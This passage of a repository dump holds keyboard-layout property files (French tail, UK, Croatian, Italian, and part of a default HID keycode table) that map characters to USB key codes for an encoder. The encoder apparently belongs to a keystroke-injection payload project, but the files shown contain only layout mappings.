MODIFIERKEY_SHIFT\t\t\t\t\n// 55 8\nASCII_38 = KEY_8, MODIFIERKEY_SHIFT\t\t\t\t\n// 57 9\nASCII_39 = KEY_9, MODIFIERKEY_SHIFT\t\t\t\t\n// 58 :\nASCII_3A = KEY_PERIOD\t\t\t\t\t\n// 59 ;\nASCII_3B = KEY_COMMA\t\t\t\t\t\n// 60 <\nASCII_3C = KEY_NON_US_100\t\t\t\t\n// 61 =\nASCII_3D = KEY_EQUAL\t\t\t\t\t\n// 62 >\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\t\t\t\n// 63 ?\nASCII_3F = KEY_M, MODIFIERKEY_SHIFT\t\t\t\t\n// 64 @\nASCII_40 = KEY_0, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 65 A\nASCII_41 = KEY_Q, MODIFIERKEY_SHIFT\n// 66 B\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\t\t\t\t\n// 67 C\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\t\t\t\t\n// 68 D\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\t\t\t\t\n// 69 E\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\t\t\t\t\n// 70 F\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\t\t\t\t\n// 71 G\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\t\t\t\t\n// 72 H\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\t\t\t\t\n// 73 I\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\t\t\t\t\n// 74 J\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\t\t\t\t\n// 75 K\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\t\t\t\t\n// 76 L\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\t\t\t\t\n// 77 M\nASCII_4D = KEY_SEMICOLON, MODIFIERKEY_SHIFT\t\t\t\n// 78 N\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\t\t\t\t\n// 79 O\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\t\t\t\t\n// 80 P\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\t\t\t\t\n// 81 Q\nASCII_51 = KEY_A, MODIFIERKEY_SHIFT\t\t\t\t\n// 82 R\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\t\t\t\t\n// 83 S\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\t\t\t\t\n// 84 T\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\t\t\t\t\n// 85 U\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\t\t\t\t\n// 86 V\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\t\t\t\t\n// 87 W\nASCII_57 = KEY_Z, MODIFIERKEY_SHIFT\t\t\t\t\n// 88 X\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\t\t\t\t\n// 89 Y\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\t\t\t\t\n// 90 Z\nASCII_5A = KEY_W, MODIFIERKEY_SHIFT\t\t\t\t\n// 91 [\nASCII_5B = KEY_5, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 92\nASCII_5C = KEY_8, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n // 93 ]\nASCII_5D = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 94 ^\nASCII_5E = KEY_9, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 95 _\nASCII_5F = KEY_8\t\t\t\t\t\n// 96 `\nASCII_60 = KEY_7, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 97 a\nASCII_61 = KEY_Q\n// 98 b\nASCII_62 = KEY_B\t\t\t\t\t\n// 99 c\nASCII_63 = KEY_C\n// 100 d\nASCII_64 = KEY_D\t\t\t\t\t\n// 101 e\nASCII_65 = KEY_E\t\t\t\t\t\n// 102 f\nASCII_66 = KEY_F\t\t\t\t\t\n// 103 g\nASCII_67 = KEY_G\t\t\t\t\t\n// 104 h\nASCII_68 = KEY_H\t\t\t\t\t\n// 105 i\nASCII_69 = KEY_I\t\t\t\t\t\n// 106 j\nASCII_6A = KEY_J\t\t\t\t\t\n// 107 k\nASCII_6B = KEY_K\t\t\t\t\t\n// 108 l\nASCII_6C = KEY_L\t\t\t\t\t\n// 109 m\nASCII_6D = KEY_SEMICOLON\t\t\t\t\n// 110 n\nASCII_6E = KEY_N\t\t\t\t\t\n// 111 o\nASCII_6F = KEY_O\t\t\t\t\t\n// 112 p\nASCII_70 = KEY_P\t\t\t\t\t\n// 113 q\nASCII_71 = KEY_A\t\t\t\t\t\n// 114 r\nASCII_72 = KEY_R\t\t\t\t\t\n// 115 s\nASCII_73 = KEY_S\t\t\t\t\t\n// 116 t\nASCII_74 = KEY_T\t\t\t\t\t\n// 117 u\nASCII_75 = KEY_U\t\t\t\t\t\n// 118 v\nASCII_76 = KEY_V\t\t\t\t\t\n// 119 w\nASCII_77 = KEY_Z\t\t\t\t\t\n// 120 x\nASCII_78 = KEY_X\t\t\t\t\t\n// 121 y\nASCII_79 = KEY_Y\t\t\t\t\t\n// 122 z\nASCII_7A = KEY_W\t\t\t\t\t\n// 123 {\nASCII_7B = KEY_4, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 124 |\nASCII_7C = KEY_6, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 125 }\nASCII_7D = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 126 ~\nASCII_7E = KEY_2, MODIFIERKEY_RIGHT_ALT\t\t\t\n// 127\nASCII_7F = KEY_BACKSPACE\t\t\t\t\n// 160 Nonbreakng Space\nISO_8859_1_A0\tKEY_SPACE\t\t\t\t\n// 163 Pound Sign\nISO_8859_1_A3\tKEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\t\t\n// 164 Currency or Euro Sign\nISO_8859_1_A4\tKEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\t\t\n// 167 SECTION SIGN\nISO_8859_1_A7\tKEY_SLASH, MODIFIERKEY_SHIFT\t\t\t\n// 176 DEGREE SIGN\nISO_8859_1_B0\tKEY_MINUS, MODIFIERKEY_SHIFT\t\t\t\n// 178 SUPERSCRIPT TWO\nISO_8859_1_B2\tKEY_TILDE\t\t\t\t\n// 181 MICRO SIGN\nISO_8859_1_B5\tKEY_BACKSLASH, MODIFIERKEY_SHIFT\t\t\n// 224 a GRAVE\nISO_8859_1_E0\tKEY_0\t\t\t\t\t\n// 231 c CEDILLA\nISO_8859_1_E7\tKEY_9\t\t\t\t\t\n// 232 e GRAVE\nISO_8859_1_E8\tKEY_7\t\t\t\t\t\n// 233 e ACUTE\nISO_8859_1_E9\tKEY_2\t\t\t\t\t\n// 249 u GRAVE\nISO_8859_1_F9\tKEY_COMMA\t\t\t\t\n// Euro Sign\nUNICODE_20AC\tKEY_E, MODIFIERKEY_RIGHT_ALT\t\t\t\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/gb.properties", "content": "//LAYOUT_UNITED_KINGDOM\n//KEY_NON_US_100 = 100\nKEY_BACKSLASH=64\nKEY_ASH=100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_5C = KEY_ASH\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_7, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_QUOTE\n// 39 ' \nASCII_28 = KEY_9, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_0, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_8, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_EQUAL, MODIFIERKEY_SHIFT\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_MINUS\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_SLASH\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_SEMICOLON\n// 59 ;\nASCII_3C = KEY_COMMA, MODIFIERKEY_SHIFT\n// 60 <\nASCII_3D = KEY_EQUAL\n// 61 =\nASCII_3E = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_QUOTE, MODIFIERKEY_SHIFT \n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_LEFT_BRACE\n// 91 [\nASCII_23 = KEY_BACKSLASH\n// 92 \nASCII_5D = KEY_RIGHT_BRACE\n// 93 ]\nASCII_5E = KEY_6, MODIFIERKEY_SHIFT\n// 94 ^\nASCII_5F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_TILDE\n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 123 {\nASCII_7E = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 124 |\nASCII_7D = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 125 }\nASCII_7C = KEY_ASH, MODIFIERKEY_SHIFT\n// 126 ~\nASCII_7F = KEY_BACKSPACE\n// 127\n\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A3 = KEY_3, MODIFIERKEY_SHIFT\n// 163 £ Pound Sign\nISO_8859_1_A6 = KEY_TILDE, MODIFIERKEY_RIGHT_ALT\n// 166 ¦ BROKEN BAR\nISO_8859_1_AC = KEY_TILDE, MODIFIERKEY_SHIFT\n// 172 ¬ NOT SIGN\n//ISO_8859_1_C1 = KEY_A, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 193 Á A ACUTE\n//ISO_8859_1_C9 = KEY_E, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 201 É E ACUTE\n//ISO_8859_1_CD = KEY_I, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 205 Í I ACUTE\n//ISO_8859_1_D3 = KEY_O, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 211 Ó O ACUTE\n//ISO_8859_1_DA = KEY_U, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 218 Ú U ACUTE\n//ISO_8859_1_E1 = KEY_A, MODIFIERKEY_RIGHT_ALT\n// 225 á a ACUTE\nISO_8859_1_E9 = KEY_E, MODIFIERKEY_RIGHT_ALT\n// 233 é e ACUTE\nISO_8859_1_ED = KEY_I, MODIFIERKEY_RIGHT_ALT\n// 237 í i ACUTE\nISO_8859_1_F3 = KEY_O, MODIFIERKEY_RIGHT_ALT\n// 243 ó o ACUTE\nISO_8859_1_FA = KEY_U, MODIFIERKEY_RIGHT_ALT\n// 250 ú u ACUTE\nUNICODE_20AC = KEY_4, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/hr.properties", "content": "//LAYOUT_CROATIAN\n//Translated by ziolity on (03/08/2014)\nKEY_NON_US_100 = 100\n\n// Nonbreakng Space\n// a b c č d e f g h i j k l m n o p r s š t u v z ž x y q w ć đ\nASCII_20 = KEY_SPACE\nASCII_61 = KEY_A\nASCII_62 = KEY_B\nASCII_63 = KEY_C\nUNICODE_10D = KEY_SEMICOLON\nASCII_64 = KEY_D\nASCII_65 = KEY_E\nASCII_66 = KEY_F\nASCII_67 = KEY_G\nASCII_68 = KEY_H\nASCII_69 = KEY_I\nASCII_6A = KEY_J\nASCII_6B = KEY_K\nASCII_6C = KEY_L\nASCII_6D = KEY_M\nASCII_6E = KEY_N\nASCII_6F = KEY_O\nASCII_70 = KEY_P\nASCII_72 = KEY_R\nASCII_73 = KEY_S\nUNICODE_161 = KEY_LEFT_BRACE\nASCII_74 = KEY_T\nASCII_75 = KEY_U\nASCII_76 = KEY_V\nASCII_7A = KEY_Y\nUNICODE_17E = KEY_BACKSLASH\nASCII_78 = KEY_X\nASCII_79 = KEY_Z\nASCII_71 = KEY_Q\nASCII_77 = KEY_W\nUNICODE_107 = KEY_QUOTE\nUNICODE_111 = KEY_RIGHT_BRACE\n// A B C Č D E F G H I J K L M N O P R S Š T U V Z Ž X Y Q W Ć Đ\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\nUNICODE_10C = KEY_SEMICOLON, MODIFIERKEY_SHIFT\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\nUNICODE_160 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\nASCII_5A = KEY_Y, MODIFIERKEY_SHIFT\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\nASCII_59 = KEY_Z, MODIFIERKEY_SHIFT\nUNICODE_17D = KEY_BACKSLASH, MODIFIERKEY_SHIFT\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\nUNICODE_106 = KEY_QUOTE, MODIFIERKEY_SHIFT\nUNICODE_110 = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// Symbols // ! \" # $ % & / ( ) = ? * < > , ; . : - _ [ ] ~ ` \\ | € ÷ × ł Ł ß ¤ { } § @\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\nASCII_2A = KEY_EQUAL, MODIFIERKEY_SHIFT\nASCII_27 = KEY_MINUS\nASCII_2B = KEY_EQUAL\nASCII_7E = KEY_1, MODIFIERKEY_RIGHT_ALT\nASCII_60 = KEY_7, MODIFIERKEY_RIGHT_ALT\nASCII_5C = KEY_Q, MODIFIERKEY_RIGHT_ALT\nASCII_7C = KEY_W, MODIFIERKEY_RIGHT_ALT\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_F7 = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_D7 = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\nASCII_5B = KEY_F, MODIFIERKEY_RIGHT_ALT\nASCII_5D = KEY_G, MODIFIERKEY_RIGHT_ALT\nUNICODE_142 = KEY_K, MODIFIERKEY_RIGHT_ALT\nUNICODE_141 = KEY_L, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_DF = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_A4 = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT\nASCII_3C = KEY_NON_US_100\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\nASCII_40 = KEY_V, MODIFIERKEY_RIGHT_ALT\nASCII_7B = KEY_B, MODIFIERKEY_RIGHT_ALT\nASCII_7D = KEY_N, MODIFIERKEY_RIGHT_ALT\nASCII_2E = KEY_PERIOD\nASCII_2D = KEY_SLASH\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\nASCII_2C = KEY_COMMA\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\nISO_8859_1_A7 = KEY_M, MODIFIERKEY_RIGHT_ALT\n// Not needed chars // input: ¸ ¨ ˇ ^ ˘ ° ˛ ˙ ´ ˝ ¨ ¸ output: ¸¨ˇ^˘°˛˙´˝¨¸ (notice no space!)\nISO_8859_1_B8 = KEY_TILDE\nISO_8859_1_A8 = KEY_TILDE, MODIFIERKEY_SHIFT\nUNICODE_2C7 = KEY_2, MODIFIERKEY_RIGHT_ALT\nASCII_5E = KEY_3, MODIFIERKEY_RIGHT_ALT\nUNICODE_2D8 = KEY_4, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B0 = KEY_5, MODIFIERKEY_RIGHT_ALT\nUNICODE_2DB = KEY_6, MODIFIERKEY_RIGHT_ALT\nUNICODE_2D9 = KEY_8, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B4 = KEY_9, MODIFIERKEY_RIGHT_ALT\nUNICODE_2DD = KEY_0, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_A8 = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\nISO_8859_1_B8 = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\n// Numbers: 0 1 2 3 4 5 6 7 8 9\nASCII_30 = KEY_0\nASCII_31 = KEY_1\nASCII_32 = KEY_2\nASCII_33 = KEY_3\nASCII_34 = KEY_4\nASCII_35 = KEY_5\nASCII_36 = KEY_6\nASCII_37 = KEY_7\nASCII_38 = KEY_8\nASCII_39 = KEY_9" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/it.properties", "content": "// Author: Armyofangels\n// 01-16-2013\n// LAYOUT_ITALIAN\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 “\nASCII_23 = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_MINUS\n// 39 ‘\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 (\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_RIGHT_BRACE\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 –\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 56 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_SEMICOLON, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_TILDE\n// 92 \\\n\nASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_EQUAL, MODIFIERKEY_SHIFT\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\n\n// ascii 60, 96: accento grave, non mappato\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 123 {\nASCII_7C = KEY_TILDE, MODIFIERKEY_SHIFT\n// 124 |\nASCII_7D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 125 }\n\n// ascii 7E, 126: tilde, non mappato\nISO_8859_1_E0 = KEY_QUOTE\n// 192 a grave\nISO_8859_1_E8 = KEY_LEFT_BRACE\n// 232 e grave\nISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 233 e acuta\nISO_8859_1_EC = KEY_EQUAL\n// 236 i grave\nISO_8859_1_F2 = KEY_SEMICOLON\n// 242 o grave\nISO_8859_1_F9 = KEY_BACKSLASH\n// 249 u grave" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/keyboard.properties", "content": "//default keys\nMODIFIERKEY_CTRL = 0x01\nMODIFIERKEY_SHIFT = 0x02\nMODIFIERKEY_ALT = 0x04\nMODIFIERKEY_GUI = 0x08\nMODIFIERKEY_LEFT_CTRL = 0x01\nMODIFIERKEY_LEFT_SHIFT = 0x02\nMODIFIERKEY_LEFT_ALT = 0x04\nMODIFIERKEY_LEFT_GUI = 0x08\nMODIFIERKEY_RIGHT_CTRL = 0x10\nMODIFIERKEY_RIGHT_SHIFT= 0x20\nMODIFIERKEY_RIGHT_ALT = 0x40\nMODIFIERKEY_RIGHT_GUI = 0x80\n\nKEY_MEDIA_VOLUME_INC = 0x80\nKEY_MEDIA_VOLUME_DEC = 0x81\nKEY_MEDIA_MUTE = 0x7F\nKEY_MEDIA_PLAY_PAUSE = 0x08\nKEY_MEDIA_NEXT_TRACK = 0x10\nKEY_MEDIA_PREV_TRACK = 0x20\n//KEY_MEDIA_STOP = 0x40\n//KEY_MEDIA_EJECT = 0x80\n\nKEY_A = 4\nKEY_B = 5\nKEY_C = 6\nKEY_D = 7\nKEY_E = 8\nKEY_F = 9\nKEY_G = 10\nKEY_H = 11\nKEY_I = 12\nKEY_J = 13\nKEY_K = 14\nKEY_L 